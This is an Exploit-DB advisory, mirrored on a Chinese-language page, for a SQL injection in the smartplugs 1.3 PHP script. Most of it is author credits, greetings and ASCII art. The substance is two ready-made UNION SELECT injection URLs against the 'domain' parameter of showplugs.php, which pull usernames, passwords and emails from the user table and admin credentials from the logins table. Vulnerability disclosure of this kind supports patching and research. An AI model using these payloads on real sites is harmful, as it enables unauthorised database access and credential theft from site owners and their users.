smartplugs 1.3 – ‘showplugs.php’ SQL Injection

  • 作者: Easy Laster
    日期: 2010-03-03
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/11623/
  • ----------------------------Information------------------------------------------------
    +Name : smartplugs 1.3 SQL Injection showplugs.php
    +Autor : Easy Laster
    +Date : 03.03.2010
    +Script: smartplugs 1.3http://www.smart-plugs.com/spv1/
    +Download : -------------
    +Price : 170$
    +Language : PHP
    +Discovered by Easy Laster
    +Security Group 4004-Security-Project
    +Greetz to Team-Internet ,Underground Agents
    +And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
    Kiba,-tmh-,Dr Chaos,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
    N00bor,Damian,novaca!ne.
    
    ---------------------------------------------------------------------------------------
     
     ___ ___ ___ ___ _ _ _____ _ _ 
    | | | | | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___|_|___ ___|_|___ ___| |_ 
    |_| | | | |_|___|_ -| -_|_| | |_| |_| | |___| __|_| . | | | -_|_|_|
    |_|___|___| |_| |___|___|___|___|_| |_|_| |_| |__||_| |___|_| |___|___|_|
    |___| |___|
    
    
    ----------------------------------------------------------------------------------------
    +Vulnerability : www.site.com/smartplugs/showplugs.php?domain=
    
    +Exploitable users: www.site.com/smartplugs/showplugs.php?domain=-9999999999'+union+select
    +1,concat(id,0x3a,username,0x3a,password,0x3a,email),3,4,5,6+from+user--+
    
    Exploitable admin : www.site.com/smartplugs/showplugs.php?domain=-9999999999'+union+
    select+1,concat(username,0x3a,password),3,4,5,6+from+logins--+
    -----------------------------------------------------------------------------------------